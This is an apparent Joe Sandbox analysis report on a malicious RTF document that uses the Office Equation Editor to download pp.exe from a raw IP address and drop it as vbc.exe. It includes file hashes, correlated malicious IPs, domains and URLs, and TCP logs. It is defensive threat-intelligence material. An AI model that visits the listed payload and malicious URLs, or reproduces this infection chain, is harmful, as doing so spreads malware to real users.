                                                                                                                                                      • Successful, ratio: 19.7% (good quality ratio 18.6%)
                                                                                                                                                      • Quality average: 69.8%
                                                                                                                                                      • Quality standard deviation: 29.5%
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 98%
                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .rtf
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                      • Active ActiveX Object
                                                                                                                                                      • Scroll down
                                                                                                                                                      • Close Viewer
                                                                                                                                                      Warnings:
                                                                                                                                                      Show All
                                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
                                                                                                                                                      • TCP Packets have been reduced to 100
                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/321301/sample/fqwBU8MyzT.rtf

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      TimeTypeDescription
                                                                                                                                                      20:04:44API Interceptor372x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                      20:04:47API Interceptor17x Sleep call for process: vbc.exe modified
                                                                                                                                                      20:04:49API Interceptor91x Sleep call for process: RegSvcs.exe modified
                                                                                                                                                      20:05:11API Interceptor107x Sleep call for process: wlanext.exe modified
                                                                                                                                                      20:06:11API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      146.148.194.209104500.exeGet hashmaliciousBrowse
                                                                                                                                                      • www.sgbanfang.com/glt/?T8kx=Jg/IIDFtDxc1kv0Qq0w5JS6M3VwEeM8XBZYNtdJs4K7ttfye2u9lQqIc4IuJQgd+A3Op&Tzu8=7n1tZr

                                                                                                                                                      Domains

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      www.sgbanfang.com104500.exeGet hashmaliciousBrowse
                                                                                                                                                      • 146.148.194.209

                                                                                                                                                      ASN

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      VNPT-AS-VNVNPTCorpVNProforma Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 202.92.6.10
                                                                                                                                                      Proforma Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 202.92.6.10
                                                                                                                                                      Proforma Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 202.92.6.10
                                                                                                                                                      qkN4OZWFG6.exeGet hashmaliciousBrowse
                                                                                                                                                      • 221.132.33.88
                                                                                                                                                      FMFF7xj5.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.207.39.131
                                                                                                                                                      rJz6SePuqu.dllGet hashmaliciousBrowse
                                                                                                                                                      • 123.19.40.157
                                                                                                                                                      Order inquiry.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.207.38.182
                                                                                                                                                      Nissin Eletach Vietnam Co., Ltd - PRODUCTS LIST.exeGet hashmaliciousBrowse
                                                                                                                                                      • 203.162.4.149
                                                                                                                                                      http://tuyethuongtra.com/wp-content/plugins/wp-nest-pages/lm/Get hashmaliciousBrowse
                                                                                                                                                      • 113.160.161.75
                                                                                                                                                      http://tuyethuongtra.com/wp-content/plugins/wp-nest-pages/lm/Get hashmaliciousBrowse
                                                                                                                                                      • 113.160.161.75
                                                                                                                                                      http://tuyethuongtra.com/wp-content/plugins/wp-nest-pages/lmGet hashmaliciousBrowse
                                                                                                                                                      • 113.160.161.75
                                                                                                                                                      OK093822333448.docGet hashmaliciousBrowse
                                                                                                                                                      • 103.255.237.196
                                                                                                                                                      http://megalighthotel.com/c9tf/Scan/jg5zl1ho/a0k89721503873576lc1wkiavm472/Get hashmaliciousBrowse
                                                                                                                                                      • 113.160.250.165
                                                                                                                                                      DETAILS.jarGet hashmaliciousBrowse
                                                                                                                                                      • 103.207.39.83
                                                                                                                                                      Readmore Details.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.207.39.83
                                                                                                                                                      SecuriteInfo.com.Trojan.PackedNET.405.16508.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.207.39.83
                                                                                                                                                      detail-information.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.207.39.83
                                                                                                                                                      INFORMATIONS.doc.......exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.207.39.83
                                                                                                                                                      executed.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.207.39.83
                                                                                                                                                      _000819.exeGet hashmaliciousBrowse
                                                                                                                                                      • 113.161.148.81
                                                                                                                                                      HENGTONG-IDC-LLCUS4lsCTb3dCs.xlsxGet hashmaliciousBrowse
                                                                                                                                                      • 104.243.142.209
                                                                                                                                                      RR300912398.exeGet hashmaliciousBrowse
                                                                                                                                                      • 202.14.6.102
                                                                                                                                                      104500.exeGet hashmaliciousBrowse
                                                                                                                                                      • 146.148.194.209
                                                                                                                                                      Email PO#.exeGet hashmaliciousBrowse
                                                                                                                                                      • 104.232.97.41
                                                                                                                                                      Proforma Invoice-1.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.127.161.217
                                                                                                                                                      winlog.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.24.153.34
                                                                                                                                                      NAMECHEAP-NETUShttp://rwiqipwvnklaqkuu.ltiliqhting.com/asci/SmFjcXVlbGluZS5TY2hyYWRlckByYWJvYmFuay5jb20=Get hashmaliciousBrowse
                                                                                                                                                      • 198.54.120.245
                                                                                                                                                      Payment conflict- aptiv 082920134110.htmGet hashmaliciousBrowse
                                                                                                                                                      • 198.54.116.10
                                                                                                                                                      Payment-244581781.docGet hashmaliciousBrowse
                                                                                                                                                      • 198.187.29.39
                                                                                                                                                      Order List.xlsxGet hashmaliciousBrowse
                                                                                                                                                      • 198.54.117.216
                                                                                                                                                      https://u19114248.ct.sendgrid.net/ls/click?upn=1kMFt-2Foese19BdzKqBBNxmUiDNiO3l4ozyKR3JHYHjGXyXtR1YgfLizwybC7hwFoy4wlb-2FUZczInc9Ssmzz4dQ-3D-3DuU6r_TCf26aIMQHFUMJSqtVnzlcWBqfQpkiFxCOBj9heiSevnqRkiapxQjkatt3r5u5xw-2FNDgXhA220pIRwcKmyMneET98pBkuhL-2FUwJCaSrvE5mZhnMBtJdZf9Opljklq5t7Y-2BINqElPIJU8bjYLY27qV6L-2FSwA36husfmMqwKagSwOgE04FdniEmY9uEbym50XNhqKw9lgczv6HrSrYNm6ouXnIayW-2FSBLzGYxoTYKe6OA-3DGet hashmaliciousBrowse
                                                                                                                                                      • 198.54.114.178
                                                                                                                                                      Certificates Profile Details Of Our Company And About Us.exeGet hashmaliciousBrowse
                                                                                                                                                      • 198.54.122.60
                                                                                                                                                      Final-Payment-Receipt.exeGet hashmaliciousBrowse
                                                                                                                                                      • 162.0.236.49
                                                                                                                                                      Payment Advice.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 185.61.154.32
                                                                                                                                                      Payment Advice.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 185.61.154.32
                                                                                                                                                      Payment Advice.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 185.61.154.32
                                                                                                                                                      Documentation.478396766.docGet hashmaliciousBrowse
                                                                                                                                                      • 198.187.31.83
                                                                                                                                                      Documentation.478396766.docGet hashmaliciousBrowse
                                                                                                                                                      • 192.64.118.88
                                                                                                                                                      tl2gnGyMz6eLhZG.exeGet hashmaliciousBrowse
                                                                                                                                                      • 104.219.248.45
                                                                                                                                                      Purchase Order 40,7045.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.61.154.55
                                                                                                                                                      74725794.no.exeGet hashmaliciousBrowse
                                                                                                                                                      • 198.54.122.60
                                                                                                                                                      Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                                                                                                                                      • 198.54.120.58
                                                                                                                                                      invoice payment.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.61.154.32
                                                                                                                                                      Certificates Profile Details Of Our Company.exeGet hashmaliciousBrowse
                                                                                                                                                      • 198.54.122.60
                                                                                                                                                      https://lfonoumkgl.zizera.com/FXGet hashmaliciousBrowse
                                                                                                                                                      • 199.188.200.253
                                                                                                                                                      xgarnica.exeGet hashmaliciousBrowse
                                                                                                                                                      • 198.54.122.60

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exe
                                                                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:downloaded
                                                                                                                                                      Size (bytes):711168
                                                                                                                                                      Entropy (8bit):7.6186010890207205
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:8uuG4MYHtSghDUtXrVNRk6ivKdKPWD4axof2YwhOT6lt6CjC2rPTVeOywSXvAfC:bjYMghDOXrK64KdIw4aVD82
                                                                                                                                                      MD5:BB30A5DD4130B071FB4CA5F005371C63
                                                                                                                                                      SHA1:52C3CA02828A4AD8E8DBF790A61B3D77379AD391
                                                                                                                                                      SHA-256:4C73FD4286E76A094EEFAFE5369F3A184CA4A38D567AE6DFAD61645BF968A83F
                                                                                                                                                      SHA-512:062F184DEA6B1327418B7030B114CC40BF21072408FB9408BC18B823BCE73534CF513A566EF16F90C0379581FB9E189D8D39614334C04C1607AFBC02089AC0D1
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 35%
                                                                                                                                                      Reputation:low
                                                                                                                                                      IE Cache URL:http://103.207.38.170/pp.exe
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'._..............P.............n.... ........@.. ....................... ............@.....................................O....... ............................................................................ ............... ..H............text...t.... ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B................P.......H.......P................................................................0..........*....0............(....(..........(.....(.....*..................0.............(.... ... 99H.a%..^E........A.......t.......[...)...+r.. kx\RZ F.<.a+...(...... ....Z J..ra+....( ..... y.Z.Z Y.@a+...(!..... ..4.Z ..3.a8z.....(".... ...Z ...Ia8a...*....0..D........ f7.i Y.~.a%..^E....!...........+..(....o....(#.... ....Z ].ha+..*.0...........($...*..0............o%...*.0............(&...*.0..
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B7CA7515-A895-478C-8EF6-6349A27B2C7C}.tmp
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):11264
                                                                                                                                                      Entropy (8bit):3.622478034078107
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:5+LEwpnggZNIocJk3tmmaHh5VZS4F8CFrhGE4AI4UmoKviXJyLWNq2zacJ9:woTmcJktCPVZ3POzP8dveq2zNJ9
                                                                                                                                                      MD5:D6338D9D8D3514DEC974E4A251100FC0
                                                                                                                                                      SHA1:F558F5201CA0F7F0B58A7F87CEB4DE79A2B63A4C
                                                                                                                                                      SHA-256:1C0DB48641768E21B5F63F4ED1D09F685134F91BC53E6169F44A94F5A3752881
                                                                                                                                                      SHA-512:F66521FD00F06CE37DF0C958BDDE96EBB065F7A8A98F9495E09A2D1A6D0DE3F546D8C81FAB5543E93E4DCC5816B96A5C747EA4EFF72EF5C79C7A425FBC60FFEC
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: #..._.)...+.2.^...*.'...9.^.1.;...+.%.?.+.`.(.,.~.;.0.0.?./.!.1.[.6.;.?.+.<.[...?.?.).@.).4.(.3.?.4.(...?.#.8.1.[.'.4.>.8.8.].;.`.1.'.*...?./.&.%.+.).?.].;...+.=.^.4.....8.%.#.3./.6.;.[.).$.5.9.5.#.8.].^.$.-.[.4.7.7.,.%.?.?.#.2...:.3.?.?._.?.3...5.?.^.$.].=._.#.~.$.*.3./.'.?.?.#.@.?.^.$.(.?.(..._.,.?.@.!.(.].@.,.?...'...,.6.?.<.>._.=.%.<.;.+.7.).[.&.<.=.2.>.3.../.?.2.!.'...>.%.5.0.).2.7.7.3.=.%.6.).-...:.$.`.+.3.~._.#.0.,.&.0.-.2.).?...).?.,.=.%...>.*.^.+.0.>.?.5.<.9.1.6.?.`.9...?.>.:.?.>.'.9.@.:.7.+.+.|.].<.$.6.@.~.)._.8.[.8.?.].'.%...#.&.3.~.).>.~.4.|.$...(.'.%.5./.`._.@.7.?.4.~.7.'.?.$.$.!...@.2.0.+.3.|.&.`.&._.?.4.?.].?.(.?.(.>.(.4.'.1.!.^.8.6.?.5.9.)...@.#.1.?.-.].?.@.,.+.?.#.?.#.?.>...>./...@.<.].*.7.'.).1.....=.%.,.?./.(...+.?./.5.*.|.<.<.!.!.@.1._.].%.6.%.?.<.?...0.9.,.'.?.2.-._.0.3.].5.4.(.~.?.'.3.^.!.2._.#.-.0.5.).'.?.&.2.&.*.4.$.?.[.5.].?..._.0.?.*.2.].:.|.1.=.!.#.#.2.`././.8.^.9.%.2.?./.^.;.>.$.0.-.1.%.-.'...:.,.?.0.4.4.?...+.=.=.@.@.,.(.?.^.$.....?.2.*.5.'.6.&.?.?.|.4.2.8.
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BD501063-4E04-4856-9DA8-291722E1F767}.tmp
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1024
                                                                                                                                                      Entropy (8bit):0.05390218305374581
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\fqwBU8MyzT.LNK
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:20 2020, mtime=Wed Aug 26 14:08:20 2020, atime=Sat Nov 21 03:04:42 2020, length=10024, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2028
                                                                                                                                                      Entropy (8bit):4.557886614404819
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:8oB/XT46kd2zvqZe+roDv3qc4dM7dD2oB/XT46kd2zvqZe+roDv3qc4dM7dV:8oB/XTDkd2zc1fQh2oB/XTDkd2zc1fQ/
                                                                                                                                                      MD5:E9735FC12377B7C04AB0CFB38ACA282C
                                                                                                                                                      SHA1:6F6A66E8CD8A5F0F960654D1A9450E6F27C427B6
                                                                                                                                                      SHA-256:289CD7F82404F1F2CC9C08FC7B84A10A65344102E08DEDDAD67D2E33E9C675EE
                                                                                                                                                      SHA-512:FECE57AB6D01AE3DBF5E43E47ACA2A41D22B218FCA50BCAE0C28A70C3F5381B8E5DC379101FC76079A326DB60CEA66203A9781A92A20B5A51C6829B13B6BE43C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: L..................F.... ....Pd..{...Pd..{...rp....('...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.('..uQ. .FQWBU8~1.RTF..J.......Q.y.Q.y*...8.....................f.q.w.B.U.8.M.y.z.T...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\585948\Users.user\Desktop\fqwBU8MyzT.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.f.q.w.B.U.8.M.y.z.T...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......585948..........D_....3N...W...9F.C...........[D_....3N...W...9F.C..
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):70
                                                                                                                                                      Entropy (8bit):4.53931900289512
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:HIUpnfNpzCbTwnfNpzCmxWIUpnfNpzCv:HpVNp+MNpqVNpI
                                                                                                                                                      MD5:B497E87D82221936A428D7E2E1009F13
                                                                                                                                                      SHA1:FE5FB05D98A16AD8007A4EA2EAC07CF40BD7C1E4
                                                                                                                                                      SHA-256:323E4670339317BDFA8ABAE5C0E9FDC09FBA1F69D3FBAFD6C65C3B827AB701FB
                                                                                                                                                      SHA-512:A980FB76728497CDD561C7D91FBCE6BF18CB21F20A365D6C0BDD671E2C9AAA6B788D203C2D39D189C9FC54CF0A6503EB4AB1284B61776123D14EBF6B2AB015FE
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: [misc]..fqwBU8MyzT.LNK=0..fqwBU8MyzT.LNK=0..[misc]..fqwBU8MyzT.LNK=0..
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):162
                                                                                                                                                      Entropy (8bit):2.431160061181642
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                                                                                                                                      MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                                                                                                                                      SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                                                                                                                                      SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                                                                                                                                      SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                                                                                                                                      C:\Users\user\Desktop\~$wBU8MyzT.rtf
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):162
                                                                                                                                                      Entropy (8bit):2.431160061181642
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                                                                                                                                      MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                                                                                                                                      SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                                                                                                                                      SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                                                                                                                                      SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                                                                                                                                      C:\Users\Public\vbc.exe
                                                                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):711168
                                                                                                                                                      Entropy (8bit):7.6186010890207205
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:8uuG4MYHtSghDUtXrVNRk6ivKdKPWD4axof2YwhOT6lt6CjC2rPTVeOywSXvAfC:bjYMghDOXrK64KdIw4aVD82
                                                                                                                                                      MD5:BB30A5DD4130B071FB4CA5F005371C63
                                                                                                                                                      SHA1:52C3CA02828A4AD8E8DBF790A61B3D77379AD391
                                                                                                                                                      SHA-256:4C73FD4286E76A094EEFAFE5369F3A184CA4A38D567AE6DFAD61645BF968A83F
                                                                                                                                                      SHA-512:062F184DEA6B1327418B7030B114CC40BF21072408FB9408BC18B823BCE73534CF513A566EF16F90C0379581FB9E189D8D39614334C04C1607AFBC02089AC0D1
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 35%
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'._..............P.............n.... ........@.. ....................... ............@.....................................O....... ............................................................................ ............... ..H............text...t.... ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B................P.......H.......P................................................................0..........*....0............(....(..........(.....(.....*..................0.............(.... ... 99H.a%..^E........A.......t.......[...)...+r.. kx\RZ F.<.a+...(...... ....Z J..ra+....( ..... y.Z.Z Y.@a+...(!..... ..4.Z ..3.a8z.....(".... ...Z ...Ia8a...*....0..D........ f7.i Y.~.a%..^E....!...........+..(....o....(#.... ....Z ].ha+..*.0...........($...*..0............o%...*.0............(&...*.0..

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Rich Text Format data, unknown version
                                                                                                                                                      Entropy (8bit):5.500483643483778
                                                                                                                                                      TrID:
                                                                                                                                                      • Rich Text Format (5005/1) 55.56%
                                                                                                                                                      • Rich Text Format (4004/1) 44.44%
                                                                                                                                                      File name:fqwBU8MyzT.rtf
                                                                                                                                                      File size:10024
                                                                                                                                                      MD5:b115f24fcecce5e8661300527a748448
                                                                                                                                                      SHA1:9673703628a2edf4fea0b3a764357f82b4c9ce9f
                                                                                                                                                      SHA256:15655af972b632964f3327334c8809fb6cd6cd04e43f4548a32a5bb5743a75bc
                                                                                                                                                      SHA512:981c6e16ef59a337a1375367a048e63c877550137e01b7854356355c1f876c3118d606adeb33b0a047645b7eeb3806ed0a72aed5a36d7b7be4699ce23c5818ed
                                                                                                                                                      SSDEEP:192:txo49xa9Dj4BAQBR6qz0EW1qTGBGuJZzugM2U3Ucvm1Af++ldIbZ:txoX9DsBAQBR1zaqT0GumxQcuaW+ldK
                                                                                                                                                      File Content Preview:{\rtf4435#._).+2^.*'.9^1;.+%?+`(,~;00?/!1[6;?+<[.??)@)4(3?4(.?#81['4>88];`1'*.?/&%+)?];.+=^4..8%#3/6;[)$595#8]^$-[477,%??#2.:3??_?3.5?^$]=_#~$*3/'??#@?^$(?(._,?@!(]@,?.'.,6?<>_=%<;+7)[&<=2>3./?2!'.>%50)2773=%6)-.:$`+3~_#0,&0-2)?.)?,=%.>*^+0>?5<916?`9.?>:?

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:e4eea2aaa4b4b4a4

                                                                                                                                                      Static RTF Info

                                                                                                                                                      Objects

                                                                                                                                                      IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                                                                                      00000145Ehno

                                                                                                                                                      Network Behavior

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Nov 20, 2020 20:04:32.537091970 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:32.756125927 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:32.756274939 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:32.756769896 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:32.975847960 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:32.975930929 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:32.975991964 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:32.976052046 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:32.976129055 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:32.976144075 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:32.976193905 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:32.976278067 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:32.976294041 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:32.976392984 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:32.976432085 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:32.976560116 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:32.976597071 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:32.976613998 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:32.976623058 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:32.976634026 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:32.976634026 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:32.976654053 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:32.977224112 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:32.984405041 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.195771933 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.195823908 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.195867062 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.195921898 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.195970058 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.195991039 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196017981 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196028948 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196028948 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196093082 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196146011 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196171045 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196187973 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196213007 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196223021 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196276903 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196325064 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196355104 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196372032 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196382046 CET8049165103.207.38.170192.168.2.22
